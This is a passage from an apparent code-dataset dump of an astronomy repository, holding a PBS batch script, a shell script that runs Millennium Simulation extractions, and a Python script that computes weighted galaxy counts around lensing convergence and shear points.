distances\n#Distance=distances.Distance()\n#Distance.reset\n#Distance.age(1)\n" }, { "alpha_fraction": 0.6685082912445068, "alphanum_fraction": 0.7661141753196716, "avg_line_length": 26.149999618530273, "blob_id": "f389cb0ab58505bfc1984d5cd76d1385709c8da6", "content_id": "bd6bb48c47f8baafe5786c89784a2055b8a53e83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 543, "license_type": "no_license", "max_line_length": 76, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim18.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log18s.out\n#PBS -e Log18s.err\n#PBS -N 18s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr SIS\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr SIS\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr SIS\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr SIS\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": 
"d46d93571e8abb0d73072e52e5ac41a7845fb01d", "content_id": "320b77cbc5ddfc799478a1510345cf3b325ba8d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium2.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python extractMillennium_Henriques.py GGL_los_8_1_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_1_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_1_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_1_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_1_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_1_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_1_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_1_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { "alpha_fraction": 0.5704867243766785, "alphanum_fraction": 0.6483938097953796, "avg_line_length": 72.781005859375, "blob_id": "b66f5dcf8d4bf8f5a4a40240302e190f97167f5b", "content_id": "ab8a26e320a61877388b91675fd6e939897efdbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38071, "license_type": "no_license", "max_line_length": 798, "num_lines": 516, "path": "/python/catalogue_utilities/kappamed_insertstarsnobetasingleband.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu, Feb 12 2018\n# This code uses the Millenium Sumilation convergence and shear maps as well as the associated SA catalogue of galaxies, in order to compute the weighted counts for fields centered around each kappa and gamma point. 
This is done for a variety of limiting magnitudes, aperture radii, and weights.\n# run with the following arguments: lens name, field name, limiting mag, outer mask radius, type, inner mask radius, zinf, zsup (in case I remove redshift slices); e.g.: python /lfs08/rusucs/code/kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n# the code can only be used for limmag 23 or 24 currently\n\nimport numpy as np\nimport scipy\nimport sys\nimport os\nfrom os import system\nfrom scipy import special\nimport pandas as pd\nimport time\n#import distances\nfrom scipy.interpolate import griddata\nimport astropy.table as table\nfrom astropy.io import fits # for tables\n\n############################\n# function definitions\n############################\n\ndef pause():\n    programPause = raw_input(\"Press the <ENTER> key to continue...\") # use for debugging\n\ndef readbinary(replacestr):\n    replace = plane + replacestr\n    os.system(\"sed \\\"11s/.*/  const char kappa_file_name[] = \\\\\\\"\\%s\\\\\\\";/\\\" readKappaBinary.c > readKappaBinary_%s_%s_%s_%s_%s_%sinner.c_\" % (replace,lens,type,plane,float(limmag),radius,innermsk))\n    os.system(\"sed \\\"35s/.*/  fpt = fopen (\\\\\\\"kappa_values_%s_%s_%s_%s_%s_%sinner.dat\\\\\\\", \\\\\\\"w\\\\\\\");/\\\" readKappaBinary_%s_%s_%s_%s_%s_%sinner.c_ > readKappaBinary_%s_%s_%s_%s_%s_%sinner.c\" % (lens,type,plane,float(limmag),radius,innermsk,lens,type,plane,float(limmag),radius,innermsk,lens,type,plane,float(limmag),radius,innermsk))\n    os.system(\"rm -f readKappaBinary_%s_%s_%s_%s_%s_%sinner.c_\" % (lens,type,plane,float(limmag),radius,innermsk))\n    os.system(\"gcc readKappaBinary_%s_%s_%s_%s_%s_%sinner.c -o compiled_%s_%s_%s_%s_%s_%sinner.out\" % (lens,type,plane,float(limmag),radius,innermsk,lens,type,plane,float(limmag),radius,innermsk))\n    os.system(\"./compiled_%s_%s_%s_%s_%s_%sinner.out\" % (lens,type,plane,float(limmag),radius,innermsk))\n    os.system(\"rm -f readKappaBinary_%s_%s_%s_%s_%s_%sinner.c\" % (lens,type,plane,float(limmag),radius,innermsk))\n    os.system(\"rm -f compiled_%s_%s_%s_%s_%s_%sinner.out\" % (lens,type,plane,float(limmag),radius,innermsk))\n\ndef contaminants(count,cont_ugr,posxmin,posxmax,posymin,posymax,star_rmag):\n    cont = np.random.random_integers(0,499,int(count * cont_ugr)) # randomly select from the star catalogues which contain 500 stars each\n    cont_posx = np.random.uniform(posxmin,posxmax,int(count * cont_ugr))\n    cont_posy = np.random.uniform(posymin,posymax,int(count * cont_ugr))\n    cont_rmag = star_rmag[cont]\n    return cont, cont_posx, cont_posy, cont_rmag\n\ndef weightedcounts(cat,spacing,lim1D,cells_on_a_side,L_field,L_pix,cells,kappagamma,pln,bands):\n    initialized = 0\n    for i in range(spacing):\n        for j in range(spacing):\n            print \"(%s,%s)/(%s,%s) for radius %s\" % (i+1,j+1,spacing,spacing,radius)\n            grid_x, grid_y = np.mgrid[lim1D + i:4096 - lim1D - (4096 - 2 * lim1D) % spacing - spacing + i:complex(0,cells_on_a_side), lim1D + j:4096 - lim1D - (4096 - 2 * lim1D) % spacing - spacing + j:complex(0,cells_on_a_side)] # the grid containing the kappa pixel at the center of cells\n            cellx = grid_x.flatten()\n            celly = grid_y.flatten()\n            cellxy = np.array([cellx,celly])\n            posxy = np.array([-0.5 * L_field + (1 + cellxy[0] + 0.5) * L_pix, -0.5 * L_field + (1 + cellxy[1] + 0.5) * L_pix])\n            cellkappagamma = np.c_[cells,kappagamma[:,][(cellxy[0] * 4096 + cellxy[1]).astype(int)]]\n            index = griddata(posxy.T, cells, (cat[:,index_posx], cat[:,index_posy]), method='nearest')\n            sep = 
np.sqrt((posxy[0][index.astype(int)]-cat[:,index_posx])**2 + (posxy[1][index.astype(int)]-cat[:,index_posy])**2)*1/degree*3600\n            cat_msk = np.c_[cat,index,sep]\n            catinner = cat_msk[cat_msk[:,index_sep] <= innermsk] # so that I can count how many objects are inside the inner mask\n            cat_msk = cat_msk[cat_msk[:,index_sep] <= radius] # mask objects at distance larger than the aperture from the center\n            cat_msk = cat_msk[cat_msk[:,index_sep] > innermsk] # uses the inner mask\n            cat_msk[:,index_sep][cat_msk[:,index_sep] < 10] = 10\n            #cat = np.c_[z,posx,posy,mstar,rmag...]\n\n            w_gal_2X = np.bincount(cat_msk[:,index_index].astype(int)) # 2X stands for 23 or 24 limmag\n            galinner = np.bincount(catinner[:,index_index].astype(int)) # counts objects inside the inner mask\n            index_all = np.unique(index.astype(int)) # sorts all unique entries; galinner and w_gal_2X may contain fewer elements, because in some indexed cells (it seems largest index only) there may be no galaxies, so I need to expand them to include all indices\n            #print len(index_all),len(w_gal_2X),len(galinner)\n            try:\n                w_gal_2X = np.append(w_gal_2X,np.zeros(len(index_all)-len(w_gal_2X))) # in rare cases, for the 45\" aperture, index will have missing fields (it will miss one of the integers from 0 to len(index)). So this assignment will not work, because len(index_all)-len(w_gal_2X) is a negative number\n                galinner = np.append(galinner,np.zeros(len(index_all)-len(galinner)))\n            except:\n                missing = []\n                for k in range(len(index_all)):\n                    if k not in index_all: missing = np.append(missing,k)\n                for k in range(len(missing)):\n                    insert = np.copy(cat_msk[0]) # any entry would do\n                    insert[index_index] = missing[k]\n                    cat_msk = np.append(cat_msk,insert.reshape(1,5),axis = 0)\n                index_all = np.append(index_all,missing)\n                w_gal_2X = np.append(w_gal_2X,np.zeros(len(index_all)-len(w_gal_2X)))\n                galinner = np.append(galinner,np.zeros(len(index_all)-len(galinner)))\n\n            try:\n                p_oneoverr = pd.DataFrame({'cell':cat_msk[:,index_index].astype(int),'oneoverr':1.0 / cat_msk[:,index_sep]})\n                w_oneoverr_2X = p_oneoverr.groupby(['cell']).median().values[:,0] * w_gal_2X # this might fail for radius=45, where there are the largest fluctuations in the number of galaxies, and as I remove galaxies from cat_msk there might be an index for which all cells contain zero galaxies. In that case the index is removed from cat_msk, but _zweight.groupby(['cell']).median().values[:,0] needs all indices to be present. 
The solution is to insert a ghost line into cat_msk for each missing index\n except:\n #print len(w_gal_2X[w_gal_2X==0])\n missing = np.array([])\n cat_msk_unique = np.unique(cat_msk[:,index_index]).astype(int) # to speed up the search\n for k in range(int(np.max(index_all))):\n if k not in cat_msk_unique:\n missing = np.append(missing,np.array([k]))\n for k in range(len(missing)):\n insert = np.copy(cat_msk[0]) # any entry would do\n insert[index_index] = missing[k]\n cat_msk=np.append(cat_msk,insert.reshape(1,5),axis = 0)\n\n p_oneoverr = pd.DataFrame({'cell':cat_msk[:,index_index].astype(int),'oneoverr':1.0 / cat_msk[:,index_sep]})\n #for k in range(len(missing)):\n #cat_msk = np.delete(cat_msk,-1,axis = 0) # delete the last line I inserted above; actually this is not necessary because cat_msk is no longer used\n w_oneoverr_2X = p_oneoverr.groupby(['cell']).median().values[:,0] * w_gal_2X\n\n cellkappagamma = np.c_[cellkappagamma,w_gal_2X,w_oneoverr_2X,galinner]\n cellkappagammastyle = np.c_[cellkappagamma[:,1].astype(int),np.around(cellkappagamma[:,2],decimals=5),np.around(cellkappagamma[:,3],decimals=5),np.around(cellkappagamma[:,4],decimals=5),cellkappagamma[:,5].astype(int),np.around(cellkappagamma[:,6],decimals=4),cellkappagamma[:,7].astype(int)]\n if initialized != 0:\n \tcellkappagammafinal = np.r_[cellkappagammafinal,cellkappagammastyle]\n else:\n f = '%snobeta%s%smedinject_%s_%s_%s_%s_%s_%sarcsecinner.fits' % (rootwghtratios,pln,type,bands,lens,plane[0:13],limmag,radius,innermsk)\n os.system('rm -f %s' % f)\n cellkappagammafinal = cellkappagammastyle\n initialized = 1\n if (i == spacing - 1) and (j == spacing - 1):\n tableout = table.Table(cellkappagammafinal, names=('ID', 'kappa', 'gamma1', 'gamma2', 'w_gal_%s' % limmag, 'w_oneoverr_%s' % limmag, 'galinner_%s' % limmag), dtype=(np.int32,np.float32,np.float32,np.float32,np.int32,np.float32,np.float32))\n #fits.append(f, tableout.as_array())\n tableout.write(f)\n del tableout\n\n############################\n# lens information\n############################\n\nstart_time = time.time()\n\nlens = str(sys.argv[1])\nplane = str(sys.argv[2])\nlimmag = float(str(sys.argv[3]))\nradiusstr = str(sys.argv[4])\ntype = str(sys.argv[5]) # computed or measured\ninnermsk = int(str(sys.argv[6])) # inner mask in arcsec\n\nif lens == \"PG1115\":\n brightmag = 15.3\n #limmag = 22.5\n pln = 34\n if (radiusstr == \"45\"):\n hstcoverage = 0\n radius = 45\n fracspec20 = 1 # gal+stars\n fracspec21 = 1\n fracspec22 = 0.73\n fracspec23 = 0.15\n fracspec24 = 0.00\n if (radiusstr == \"120\"):\n hstcoverage = 0\n radius = 120\n fracspec20 = 0.69\n fracspec21 = 0.81\n fracspec22 = 0.52\n fracspec23 = 0.07\n fracspec24 = 0.00\n\nrootwghtratios = \"/lfs08/rusucs/%s/MSwghtratios/\" % lens\n#rootwghtratios = \"/u/flashscratch/c/cerusu/MSwghtratios/\"\n#rootwghtratios = \"/mnt/scratch/rusucs/%s/MSwghtratios/\" % lens\n#rootwghtratios = \"/Volumes/LaCieSubaru/MSweights/\"\nrootgals = \"/lfs08/rusucs/%s/MSgals/\" % lens\n#rootgals = \"/u/flashscratch/c/cerusu/MSgals/\"\n#rootgals = \"/mnt/scratch/rusucs/%s/MSgals/\" % lens\n#rootgals = \"/Volumes/LaCieSubaru/MSgals/\"\nrootkappaplanes = \"/lfs08/rusucs/kappaplanes/\"\n#rootkappaplanes = \"/u/flashscratch/c/cerusu/kappaplanes/\"\n#rootkappaplanes = \"/mnt/scratch/rusucs/kappaplanes/\"\n#rootkappaplanes = \"/Volumes/LaCieSubaru/kappaplanes/\"\nrootstars = \"/lfs08/rusucs/insertstars/\"\n#rootstars = \"/u/flashscratch/c/cerusu/insertstars/\"\n#rootstars = \"/Volumes/LaCieSubaru/insertstars/\"\n#rootstars = 
\"/mnt/scratch/rusucs/insertstars/\"\n\n# contamination and incompleteness based on Figure 9 W1 from Hildebrandt 2012\n\ncont_h12_18 = 0.00\ncont_h12_185 = 0.12\ncont_h12_19 = 0.08\ncont_h12_195 = 0.03\ncont_h12_20 = 0.04\ncont_h12_205 = 0.06\ncont_h12_21 = 0.05\ncont_h12_215 = 0.02\ncont_h12_22 = 0.01\ncont_h12_225 = 0.02\ncont_h12_23 = 0.03\ncont_h12_235 = 0.01\ncont_h12_24 = 0.01\n\ninc_h12_18 = 0.20\ninc_h12_185 = 0.13\ninc_h12_19 = 0.20\ninc_h12_195 = 0.00\ninc_h12_20 = 0.03\ninc_h12_205 = 0.02\ninc_h12_21 = 0.01\ninc_h12_215 = 0.07\ninc_h12_22 = 0.05\ninc_h12_225 = 0.05\ninc_h12_23 = 0.03\ninc_h12_235 = 0.02\ninc_h12_24 = 0.01\n\nnospec_18 = 1 - fracspec20\nnospec_185 = 1 - fracspec20\nnospec_19 = 1 - fracspec20\nnospec_195 = 1 - fracspec20\nnospec_20 = 1 - fracspec20\nnospec_205 = 1 - fracspec21\nnospec_21 = 1 - fracspec21\nnospec_215 = 1 - fracspec22\nnospec_22 = 1 - fracspec22\nnospec_225 = 1 - fracspec23\nnospec_23 = 1 - fracspec23\nnospec_235 = 1 - fracspec24\nnospec_24 = 1 - fracspec24\n\ncont_ugrizJHK_18 = cont_h12_18 * nospec_18 * (1 - hstcoverage)\ncont_ugrizJHK_185 = cont_h12_185 * nospec_185 * (1 - hstcoverage)\ncont_ugrizJHK_19 = cont_h12_19 * nospec_19 * (1 - hstcoverage)\ncont_ugrizJHK_195 = cont_h12_195 * nospec_195 * (1 - hstcoverage)\ncont_ugrizJHK_20 = cont_h12_20 * nospec_20 * (1 - hstcoverage)\ncont_ugrizJHK_205 = cont_h12_205 * nospec_205 * (1 - hstcoverage)\ncont_ugrizJHK_21 = cont_h12_21 * nospec_21 * (1 - hstcoverage)\ncont_ugrizJHK_215 = cont_h12_215 * nospec_215 * (1 - hstcoverage)\ncont_ugrizJHK_22 = cont_h12_22 * nospec_22 * (1 - hstcoverage)\ncont_ugrizJHK_225 = cont_h12_225 * nospec_225 * (1 - hstcoverage)\ncont_ugrizJHK_23 = cont_h12_23 * nospec_23 * (1 - hstcoverage)\ncont_ugrizJHK_235 = cont_h12_235 * nospec_235 * (1 - hstcoverage)\ncont_ugrizJHK_24 = cont_h12_24 * nospec_24 * (1 - hstcoverage)\n\ncont_ugriz_18 = cont_h12_18\ncont_ugriz_185 = cont_h12_185\ncont_ugriz_19 = cont_h12_19\ncont_ugriz_195 = cont_h12_195\ncont_ugriz_20 = cont_h12_20\ncont_ugriz_205 = cont_h12_205\ncont_ugriz_21 = cont_h12_21\ncont_ugriz_215 = cont_h12_215\ncont_ugriz_22 = cont_h12_22\ncont_ugriz_225 = cont_h12_225\ncont_ugriz_23 = cont_h12_23\ncont_ugriz_235 = cont_h12_235\ncont_ugriz_24 = cont_h12_24\n\ninc_ugrizJHK_18 = inc_h12_18 * nospec_18 * (1 - hstcoverage)\ninc_ugrizJHK_185 = inc_h12_185 * nospec_185 * (1 - hstcoverage)\ninc_ugrizJHK_19 = inc_h12_19 * nospec_19 * (1 - hstcoverage)\ninc_ugrizJHK_195 = inc_h12_195 * nospec_195 * (1 - hstcoverage)\ninc_ugrizJHK_20 = inc_h12_20 * nospec_20 * (1 - hstcoverage)\ninc_ugrizJHK_205 = inc_h12_205 * nospec_205 * (1 - hstcoverage)\ninc_ugrizJHK_21 = inc_h12_21 * nospec_21 * (1 - hstcoverage)\ninc_ugrizJHK_215 = inc_h12_215 * nospec_215 * (1 - hstcoverage)\ninc_ugrizJHK_22 = inc_h12_22 * nospec_22 * (1 - hstcoverage)\ninc_ugrizJHK_225 = inc_h12_225 * nospec_225 * (1 - hstcoverage)\ninc_ugrizJHK_23 = inc_h12_23 * nospec_23 * (1 - hstcoverage)\ninc_ugrizJHK_235 = inc_h12_235 * nospec_235 * (1 - hstcoverage)\ninc_ugrizJHK_24 = inc_h12_24 * nospec_24 * (1 - hstcoverage)\n\ninc_ugriz_18 = inc_h12_18\ninc_ugriz_185 = inc_h12_185\ninc_ugriz_19 = inc_h12_19\ninc_ugriz_195 = inc_h12_195\ninc_ugriz_20 = inc_h12_20\ninc_ugriz_205 = inc_h12_205\ninc_ugriz_21 = inc_h12_21\ninc_ugriz_215 = inc_h12_215\ninc_ugriz_22 = inc_h12_22\ninc_ugriz_225 = inc_h12_225\ninc_ugriz_23 = inc_h12_23\ninc_ugriz_235 = inc_h12_235\ninc_ugriz_24 = inc_h12_24\n\n# read the stellar contaminants I will insert\n\n# !!!!!!!!!!! 
the mags are actually i-band, not r-band, but I will ignore that since I'm not 'estimating' z and Mstar\nstar_rmag_18 = np.loadtxt(\"%sstar018zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_185 = np.loadtxt(\"%sstar18185zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_19 = np.loadtxt(\"%sstar18519zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_195 = np.loadtxt(\"%sstar19195zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_20 = np.loadtxt(\"%sstar19520zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_205 = np.loadtxt(\"%sstar20205zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_21 = np.loadtxt(\"%sstar20521zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_215 = np.loadtxt(\"%sstar21215zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_22 = np.loadtxt(\"%sstar21522zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_225 = np.loadtxt(\"%sstar22225zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_23 = np.loadtxt(\"%sstar22523zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_235 = np.loadtxt(\"%sstar23235zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_24 = np.loadtxt(\"%sstar23524zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\n\n############################\n# read the binary kappa file\n############################\n\nstart_readkappa = time.time()\n\nif str(pln) in plane:\n os.chdir(rootkappaplanes)\n readbinary(\".kappa\")\n pos1D,kappa = np.loadtxt(\"kappa_values_%s_%s_%s_%s_%s_%sinner.dat\" % (lens,type,plane,float(limmag),radius,innermsk), unpack=True)\n readbinary(\".gamma_1\")\n gamma1 = np.loadtxt(\"kappa_values_%s_%s_%s_%s_%s_%sinner.dat\" % (lens,type,plane,float(limmag),radius,innermsk), usecols = [1], unpack=True)\n readbinary(\".gamma_2\")\n gamma2 = np.loadtxt(\"kappa_values_%s_%s_%s_%s_%s_%sinner.dat\" % (lens,type,plane,float(limmag),radius,innermsk), usecols = [1], unpack=True)\n kappagamma = np.c_[pos1D,kappa,gamma1,gamma2]\n os.system(\"rm -f kappa_values_%s_%s_%s_%s_%s_%sinner.dat\" % (lens,type,plane,float(limmag),radius,innermsk))\nelse: sys.exit('Wrong MS plane for this lens!!!')\n\n############################\n# prepare the galaxy catalogues\n############################\n\nstart_readcat = time.time()\n\nposx_ugrizJHK = np.array([])\nposy_ugrizJHK = np.array([])\nrmag_ugrizJHK = np.array([])\n\nposx_ugriz = np.array([])\nposy_ugriz = np.array([])\nrmag_ugriz = np.array([])\n\nroot = plane[0:13]\n\nfor i in range(4):\n for j in range(4):\n file_ugrizJHK = '%s%s_%d_%d_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_sampledr.images.txt' % (rootgals,root,i,j)\n file_ugriz = '%s%s_%d_%d_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_originalr.images.txt' % (rootgals,root,i,j)\n if \"measured\" in type:\n posx__ugrizJHK, posy__ugrizJHK, rmag__ugrizJHK = np.loadtxt(file_ugrizJHK, usecols = (2,3,4), unpack=True)\n posx__ugriz, posy__ugriz, rmag__ugriz = np.loadtxt(file_ugriz, usecols = (2,3,4), unpack=True)\n elif \"computed\" in type:\n posx__ugrizJHK, posy__ugrizJHK, rmag__ugrizJHK = np.loadtxt(file_ugriz, usecols = (2,3,4), unpack=True)\n posx__ugriz, posy__ugriz, rmag__ugriz = np.loadtxt(file_ugriz, usecols = 
(2,3,4), unpack=True)\n        else: sys.exit('Only \\\"measured\\\" and \\\"computed\\\" are accepted as the fifth argument of the code. Execution stopped.')\n\n        if \"measured\" in type:\n            # count the galaxies in order to implement the fraction of stars\n            count18 = posx__ugrizJHK[(rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= 18)].size\n            count185 = posx__ugrizJHK[(rmag__ugrizJHK > 18) & (rmag__ugrizJHK <= 18.5)].size\n            count19 = posx__ugrizJHK[(rmag__ugrizJHK > 18.5) & (rmag__ugrizJHK <= 19)].size\n            count195 = posx__ugrizJHK[(rmag__ugrizJHK > 19) & (rmag__ugrizJHK <= 19.5)].size\n            count20 = posx__ugrizJHK[(rmag__ugrizJHK > 19.5) & (rmag__ugrizJHK <= 20)].size\n            count205 = posx__ugrizJHK[(rmag__ugrizJHK > 20) & (rmag__ugrizJHK <= 20.5)].size\n            count21 = posx__ugrizJHK[(rmag__ugrizJHK > 20.5) & (rmag__ugrizJHK <= 21)].size\n            count215 = posx__ugrizJHK[(rmag__ugrizJHK > 21) & (rmag__ugrizJHK <= 21.5)].size\n            count22 = posx__ugrizJHK[(rmag__ugrizJHK > 21.5) & (rmag__ugrizJHK <= 22)].size\n            count225 = posx__ugrizJHK[(rmag__ugrizJHK > 22) & (rmag__ugrizJHK <= 22.5)].size\n            count23 = posx__ugrizJHK[(rmag__ugrizJHK > 22.5) & (rmag__ugrizJHK <= 23)].size\n            count235 = posx__ugrizJHK[(rmag__ugrizJHK > 23) & (rmag__ugrizJHK <= 23.5)].size\n            count24 = posx__ugrizJHK[(rmag__ugrizJHK > 23.5) & (rmag__ugrizJHK <= 24)].size\n            #print count18,count185,count19,count195,count20,count205,count21,count215,count22,count225,count23,count235,count24\n\n            posxmin = np.min(posx__ugrizJHK) # used to insert random stellar contaminants\n            posxmax = np.max(posx__ugrizJHK)\n            posymin = np.min(posy__ugrizJHK)\n            posymax = np.max(posy__ugrizJHK)\n\n            # generate the stellar contaminants\n            cont_18,cont_posx_18,cont_posy_18,cont_rmag_18 = contaminants(count18,cont_ugrizJHK_18,posxmin,posxmax,posymin,posymax,star_rmag_18)\n            cont_185,cont_posx_185,cont_posy_185,cont_rmag_185 = contaminants(count185,cont_ugrizJHK_185,posxmin,posxmax,posymin,posymax,star_rmag_185)\n            cont_19,cont_posx_19,cont_posy_19,cont_rmag_19 = contaminants(count19,cont_ugrizJHK_19,posxmin,posxmax,posymin,posymax,star_rmag_19)\n            cont_195,cont_posx_195,cont_posy_195,cont_rmag_195 = contaminants(count195,cont_ugrizJHK_195,posxmin,posxmax,posymin,posymax,star_rmag_195)\n            cont_20,cont_posx_20,cont_posy_20,cont_rmag_20 = contaminants(count20,cont_ugrizJHK_20,posxmin,posxmax,posymin,posymax,star_rmag_20)\n            cont_205,cont_posx_205,cont_posy_205,cont_rmag_205 = contaminants(count205,cont_ugrizJHK_205,posxmin,posxmax,posymin,posymax,star_rmag_205)\n            cont_21,cont_posx_21,cont_posy_21,cont_rmag_21 = contaminants(count21,cont_ugrizJHK_21,posxmin,posxmax,posymin,posymax,star_rmag_21)\n            cont_215,cont_posx_215,cont_posy_215,cont_rmag_215 = contaminants(count215,cont_ugrizJHK_215,posxmin,posxmax,posymin,posymax,star_rmag_215)\n            cont_22,cont_posx_22,cont_posy_22,cont_rmag_22 = contaminants(count22,cont_ugrizJHK_22,posxmin,posxmax,posymin,posymax,star_rmag_22)\n            cont_225,cont_posx_225,cont_posy_225,cont_rmag_225 = contaminants(count225,cont_ugrizJHK_225,posxmin,posxmax,posymin,posymax,star_rmag_225)\n            cont_23,cont_posx_23,cont_posy_23,cont_rmag_23 = contaminants(count23,cont_ugrizJHK_23,posxmin,posxmax,posymin,posymax,star_rmag_23)\n            cont_235,cont_posx_235,cont_posy_235,cont_rmag_235 = contaminants(count235,cont_ugrizJHK_235,posxmin,posxmax,posymin,posymax,star_rmag_235)\n            cont_24,cont_posx_24,cont_posy_24,cont_rmag_24 = contaminants(count24,cont_ugrizJHK_24,posxmin,posxmax,posymin,posymax,star_rmag_24)\n            #print 
cont_18.size,cont_185.size,cont_19.size,cont_195.size,cont_20.size,cont_205.size,cont_21.size,cont_215.size,cont_22.size,cont_225.size,cont_23.size,cont_235.size,cont_24.size\n\n # masking the fraction of galaxies expected to not be detected as galaxies, due to incompleteness; here also apply the brightmag, limmag, z_s and z gap cuts\n posx__ugrizJHK = posx__ugrizJHK[(rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= limmag) & (((rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= 18)) | ((rmag__ugrizJHK > 18) & (rmag__ugrizJHK <= 18.5)) | ((rmag__ugrizJHK > 18.5) & (rmag__ugrizJHK <= 19)) | ((rmag__ugrizJHK > 19) & (rmag__ugrizJHK <= 19.5)) | ((rmag__ugrizJHK > 19.5) & (rmag__ugrizJHK <= 20)) | ((rmag__ugrizJHK > 20) & (rmag__ugrizJHK <= 20.5)) | ((rmag__ugrizJHK > 20.5) & (rmag__ugrizJHK <= 21)) | ((rmag__ugrizJHK > 21) & (rmag__ugrizJHK <= 21.5)) | ((rmag__ugrizJHK > 21.5) & (rmag__ugrizJHK <= 22)) | ((rmag__ugrizJHK > 22) & (rmag__ugrizJHK <= 22.5)) | ((rmag__ugrizJHK > 22.5) & (rmag__ugrizJHK <= 23)) | ((rmag__ugrizJHK > 23) & (rmag__ugrizJHK <= 23.5)) | ((rmag__ugrizJHK > 23.5) & (rmag__ugrizJHK <= 24)))]\n posy__ugrizJHK = posy__ugrizJHK[(rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= limmag) & (((rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= 18)) | ((rmag__ugrizJHK > 18) & (rmag__ugrizJHK <= 18.5)) | ((rmag__ugrizJHK > 18.5) & (rmag__ugrizJHK <= 19)) | ((rmag__ugrizJHK > 19) & (rmag__ugrizJHK <= 19.5)) | ((rmag__ugrizJHK > 19.5) & (rmag__ugrizJHK <= 20)) | ((rmag__ugrizJHK > 20) & (rmag__ugrizJHK <= 20.5)) | ((rmag__ugrizJHK > 20.5) & (rmag__ugrizJHK <= 21)) | ((rmag__ugrizJHK > 21) & (rmag__ugrizJHK <= 21.5)) | ((rmag__ugrizJHK > 21.5) & (rmag__ugrizJHK <= 22)) | ((rmag__ugrizJHK > 22) & (rmag__ugrizJHK <= 22.5)) | ((rmag__ugrizJHK > 22.5) & (rmag__ugrizJHK <= 23)) | ((rmag__ugrizJHK > 23) & (rmag__ugrizJHK <= 23.5)) | ((rmag__ugrizJHK > 23.5) & (rmag__ugrizJHK <= 24)))]\n rmag__ugrizJHK = rmag__ugrizJHK[(rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= limmag) & (((rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= 18)) | ((rmag__ugrizJHK > 18) & (rmag__ugrizJHK <= 18.5)) | ((rmag__ugrizJHK > 18.5) & (rmag__ugrizJHK <= 19)) | ((rmag__ugrizJHK > 19) & (rmag__ugrizJHK <= 19.5)) | ((rmag__ugrizJHK > 19.5) & (rmag__ugrizJHK <= 20)) | ((rmag__ugrizJHK > 20) & (rmag__ugrizJHK <= 20.5)) | ((rmag__ugrizJHK > 20.5) & (rmag__ugrizJHK <= 21)) | ((rmag__ugrizJHK > 21) & (rmag__ugrizJHK <= 21.5)) | ((rmag__ugrizJHK > 21.5) & (rmag__ugrizJHK <= 22)) | ((rmag__ugrizJHK > 22) & (rmag__ugrizJHK <= 22.5)) | ((rmag__ugrizJHK > 22.5) & (rmag__ugrizJHK <= 23)) | ((rmag__ugrizJHK > 23) & (rmag__ugrizJHK <= 23.5)) | ((rmag__ugrizJHK > 23.5) & 